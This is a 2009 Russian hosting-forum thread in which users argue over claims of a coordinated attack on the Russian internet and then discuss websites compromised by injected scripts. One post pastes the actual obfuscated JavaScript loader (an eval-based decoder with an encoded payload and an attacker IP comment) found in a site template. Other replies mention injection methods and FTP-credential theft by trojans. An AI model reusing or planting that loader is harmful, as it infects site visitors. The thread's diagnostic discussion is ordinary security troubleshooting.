Ayola.net
Новости: В связи с обилием спама, постинг на форуме временно закрыт.

Для связи с поддержкой используйте тикеты в панели управления.
 
*
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь. Октябрь 17, 2017, 08:42:14


Войти


Страниц: [1]
  Печать  
Автор Тема: В российском сегменте Интернета происходит что-то непонятное  (Прочитано 18987 раз)
0 Пользователей и 1 Гость смотрят эту тему.
Radosvet
Новичёк
*

Карма: -2
Сообщений: 18


Просмотр профиля
« : Апрель 11, 2009, 20:51:50 »

Последние числа марта отметились странными событиями, происходящими в российском сегменте Интернета.


Всё началось с того, что посещая привычные новостные сайты мы обнаружили, что многие страницы пытаются передать инфицированные файлы – противовирусные программы просто начинали гвалт с просьбами покинуть страницу.


Следующим удивительным открытием было массовое инфицирование файлообменников, где крайне сложно встретить идиота, заливающего заведомо инфицированный mp3 или mp4. Сейчас же картина, невиданная нами с 1996-го года, когда развлекающихся вирусописателей было много, а программ-противорирусов никто почти и не знал, РОССИЙСКИЕ файлообменники просто кишат вирусами, хотя не в интересах компаний не проверять содержимое дисков на разный мусор.


Третьим открытием было неоткрытие (извините за каламбур) трети и более страниц, предлагаемых поисковиком: из десяти активированных ссылок три, если не половина не открываются, сообщая о «текущих работах на сервере». Даже поисковик Яндекс регулярно недоступен – а ведь это не изба-читальня, а рекламный бизнес с огромными обязательствами. Мы всё понимаем про такие работы, но не до такой же степени.


Но более всего нас удивило другое, когда общаясь с одним из знакомых системных администраторов, мы услышали, что у его фирмы лёг сервер, который буквально нафаршировали вирусами. И такая же или подобная картина как у коллег этого программиста в других конторах, так и у некоторых других наших знакомых системных администраторов: люди по двое суток сидят на работе и ковыряются в службах и сервисах.


Мы не сильно, конечно, большие специалисты в интернете, но точно знаем: так не бывает. В Интернете что-то происходит. Происходит именно в российском секторе, так как те, кто у кого хосты у зарубежных провайдеров, работают нормально. Что – не очень понятно, однако из всех рассмотренных нами версий самой правдоподобной кажется самая простая. Мы полагаем, что в эти дни шла обкатка какого-то оборудования, позволяющего манипулировать с сетью. То есть либо организовать в России «китайский вариант» Интернета (с блокировкой провайдерами запрещенных сайтов и доменов), либо это будет нечто новое, способное валить сервера нелояльных режиму Интернет-компаний, собирать информацию о трафике, прослушивать переговоры по сети и так далее. Хотя, может быть и так, что наоборот, кто-то со стороны, тестирует весь российский Интернет. Всё очень непонятно.


Выводы пока делать рано, но если такая система вводится – вводится она к чему-то. Поэтому мы решили вынести вопрос на обсуждение IT-специалистов, для начала хотя бы узнав массовость глюков. Если наши предположения про новое гнилое оборудование подтвердятся, то тут уже нужны будут другие специалисты – наши аналитики, которые попытаются догадаться: к чему бы оно?
Записан
Astraller™
Маэстро
*****

Карма: 151
Сообщений: 1389

Вселенское зло


Просмотр профиля WWW
« Ответ #1 : Апрель 12, 2009, 02:50:14 »

Идиоты, идиоты, кругом одни идиоты!©

В мемориз:
"Инфицированные mp3, mp4 файлы", "Что-то происходит с интернетом", "обкатывают программу для управления интернетом", "нелояльные сервера"... и мн. мн. др.
Записан

Гамлета здесь больше нет. Осталась только тень.
B@c!fer
Вникающий
***

Карма: 6
Сообщений: 168


Просмотр профиля WWW
« Ответ #2 : Апрель 12, 2009, 02:57:53 »

паду заражу свои серваки..а то чёт я как не все...
Записан

swer
Просветлённый
****

Карма: 14
Сообщений: 460


Просмотр профиля WWW
« Ответ #3 : Апрель 12, 2009, 06:52:32 »

Распустился интернет в российском сегменте...ну хоть вешайся.
Записан

Homo homini lupus est!(Человек человеку волк)
Фильмы DivX->Закачаешся>
Radosvet
Новичёк
*

Карма: -2
Сообщений: 18


Просмотр профиля
« Ответ #4 : Апрель 12, 2009, 09:45:14 »

 Смеющийся Статья написана тупавато. Но от себя добавлю, что на многих хостингах в сайты начали вставлять Яваскрипт который фреймом качал со сторонних сайтов всякую лабуду.
« Последнее редактирование: Апрель 12, 2009, 09:58:16 от Radosvet » Записан
atimur
Просветлённый
****

Карма: 59
Сообщений: 990


Живу в SanCity


Просмотр профиля WWW
« Ответ #5 : Апрель 12, 2009, 12:03:15 »

RBN растет, Conficker рулит, будущее за облачными вычислениями предоставляемыми бот сетями.
Хотя туманные вычисления то же ниплохо работают.
Записан

- Правда, она всегда глаза режет...
- Капча - Идите лесом...
Final_Fantasy
Старший Новичёк
**

Карма: 3
Сообщений: 79

Lugansk - region 13


Просмотр профиля
« Ответ #6 : Апрель 12, 2009, 15:06:01 »

Мда..почитал, тольк зря время выкинул.
Записан

ICQ х 487117700<учимся читать статус: Занят или не беспокоить - действительно занят, не отвеччу значит. В сети - отвечу =) />
Demonus1022
Старший Новичёк
**

Карма: 4
Сообщений: 72


Просмотр профиля
« Ответ #7 : Апрель 12, 2009, 15:23:37 »

Radosvet, налицо паранойя. Уж извините, но вирусами  mp3 или mp4 не заражаются, Яшка глючит всегда. И если Ваш файрвол неверно настроен, то Вы и локалхост не откроете при всем желании. Представьте себе мощности оборудования, чтобы "взять под контроль" рунет? Да и что-то мне слабо заметны такие измения, хоть серфлю по нету дай Боже.
Мой личный вердикт - статью фтопку!
Записан
Radosvet
Новичёк
*

Карма: -2
Сообщений: 18


Просмотр профиля
« Ответ #8 : Апрель 12, 2009, 20:18:42 »

Факт, лиш в том, что происходило в нете, что то нехорошее, многие сайты на разных хостингах, примерно в одно и тоже время были какимто "фантастическим" образом заражены (внедрён в них ява код) и таких людей слишком много и много разных хостингов.

Примерно вот таким кодом:
<script language=JavaScript>     function hnedb3b23(x) {     var y=x.length,c=1024,z,g,q,f=0,b=0,u=0,v=Array(63,53,29,33,28,27,21,18,31,14,0,0,0,0,0,0,50,25,10,20,2,6,39,37,16,30,19,34,52,58,35,15,26,9,47,11,12,8,44,55,56,40,13,0,0,0,0,4,0,23,54,57,36,60,3,17,7,59,1,42,5,45,0,62,46,24,22,43,32,41,49,38,61,51,48);for(g=Math.ceil(y/c);g>0;g--){q='';for(z=Math.min(y,c);z>0;z--,y--){{u|=(v[x.charCodeAt(f++)-48])<<b;if(b){q+=String.fromCharCode(222^u&255);u>>=8;b-=2}else{b=6}}}eval(q);}}hnedb3b23('uISVME5kzWkk0kMkm9IoPESViw8cME5Rs9ipzkBeu@MmkpsxcSomX@MRyps0zoiVi99MR8ocoWBsx990bkkkp7Iev0spM98RvDskiDskyNim@kMpVD0mzK5VvsPe3F8xJoskbDOsvpBVMP0d0kkmzyMRzk5VyP0xLspcYipMWa8oY0ocFF8xcyR0uIspkPiXk0oco5ipWwsmk9oiRNp0mkMu@piXesimmMkV0IBczESVi@OXKh0mX@MRypSXc8O') </script><!-- 88.214.232.108 --><script language="javascript" type="text/javascript">

Статью может фтопку с их логическими выводами, но факт на "лицо" как говориться, в пределах знакомых людей.
Записан
Demonus1022
Старший Новичёк
**

Карма: 4
Сообщений: 72


Просмотр профиля
« Ответ #9 : Апрель 12, 2009, 20:27:10 »

Radosvet, это не фантастический метод. Началось это уже давно на сайтах юкоза. Бага с миничатом, если вставить смайл - двиг только раз проверяет картинка ли это. А если его потом заменить... Ну, это уже детали. Вобщем, ничего тут такого нет, только шалости "кулхацкеров", которым тупо нечего делать. А скриптик такой... Легко внедрить в Гиф-анимацию и "фантастического" тут вообще ничего нет. Обыденность. Это длится который год и будет длится ровно столько же, сколько разработкой сайтов будут заниматся люди, плохо знакомые с предметом элементарной защиты этих сайтов. Ни один серьезный сайт не был замечен в заражении. А "на лицо".. Нужно составлять мнение на примере большего количества сайтов. Как говорил, серфлю много, такого не видел.
Записан
Radosvet
Новичёк
*

Карма: -2
Сообщений: 18


Просмотр профиля
« Ответ #10 : Апрель 13, 2009, 02:05:21 »

Благодарю за разьяснения. А можеш обьяснить как внедрили этот код в main.tpl в движке DLE???
Записан
graff25
Вникающий
***

Карма: 3
Сообщений: 231


Играю в мизер. Поставьте мне минус.


Просмотр профиля WWW
« Ответ #11 : Апрель 13, 2009, 02:56:30 »

Перестань пользоваться тоталкоммандером и проверь машину на вирусы;)
Записан

Radosvet
Новичёк
*

Карма: -2
Сообщений: 18


Просмотр профиля
« Ответ #12 : Апрель 13, 2009, 14:46:01 »

Никогдане пользовался тоталкомандером =) и даже на вирусы проверяю.
Записан
Demonus1022
Старший Новичёк
**

Карма: 4
Сообщений: 72


Просмотр профиля
« Ответ #13 : Апрель 13, 2009, 22:59:21 »

Radosvet, да тысячи методов! Первый - у вас нуль с бэкдором. Два - тот же миничат. Три: а у вас можно постить новости с картинками? Вот и метод. Далее, если вы скачали этот шаб с сайта, а не писали с нуля - так может, код там уже был?
graff25, а я как раз коммандером "левый" код и ищу в файлах, и что? Вирусов на машине нет уже года два, каспер стоит, плюс время от времени по сети др. вебом сканирую
Записан
graff25
Вникающий
***

Карма: 3
Сообщений: 231


Играю в мизер. Поставьте мне минус.


Просмотр профиля WWW
« Ответ #14 : Апрель 13, 2009, 23:29:58 »

А то, что командер хранит настройки фтп в обычном ини файле, в виндовс каталоге, его ворует добрая сотня троянов. (конечно если вы пароли к фтп не в голове храните. И судя по топистартеру, он вполне мог это делать.)
Записан

Radosvet
Новичёк
*

Карма: -2
Сообщений: 18


Просмотр профиля
« Ответ #15 : Апрель 14, 2009, 00:31:47 »

Demonus1022,нет, эти все варианты отпадают.
Ещё тут дело в том, что ещё у 4 человек знакомых на Айоле было также заражено (несколько на других). Потом нашёл статью в интернете, запостил. ДУмал на Айоле ктонибуть ещё с такой траблой сталкивался. Все начали чистку компов, нечего не обноружили (чистили разными антивирусами). Поэтому я подумал, что могли найти уязвимость в PHP, так как на Айоле не часто обновляют его.
Записан
Demonus1022
Старший Новичёк
**

Карма: 4
Сообщений: 72


Просмотр профиля
« Ответ #16 : Апрель 14, 2009, 00:38:55 »

graff25, тотал как фтп-клиент вообще убог. Я не говорю, что это плохая программа, нет, для некоторых вещей - весьма удобна, но не как фтп-клиент.
Radosvet, вы бы знали, сколько с юкоза плакались, что у них появились "левые" адулт попапы, баннеры и тому подобное. Это неизбежно, просто следует все-таки найти, в чем уязвимость. И это не php, на Ayola стоит вполне актуальная версия, не видел бесплатных хостингов с такой версией. Проблема явно не в Ayola, и тем более это не завоевание рунета. Как говорится, шит хэппенс.
Записан
Radosvet
Новичёк
*

Карма: -2
Сообщений: 18


Просмотр профиля
« Ответ #17 : Апрель 14, 2009, 03:59:21 »

"Ясно, будем искать" (с) В.Никулин
Записан
Страниц: [1]
  Печать  
 
Перейти в:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.13 | SMF © 2006, Simple Machines LLC

2003-2008 © ООО "Инфотур" - Бесплатный хостинг Ayola.net
Valid XHTML 1.0! Valid CSS! Dilber MC Theme by HarzeM
Страница сгенерирована за 0.101 секунд. Запросов: 17.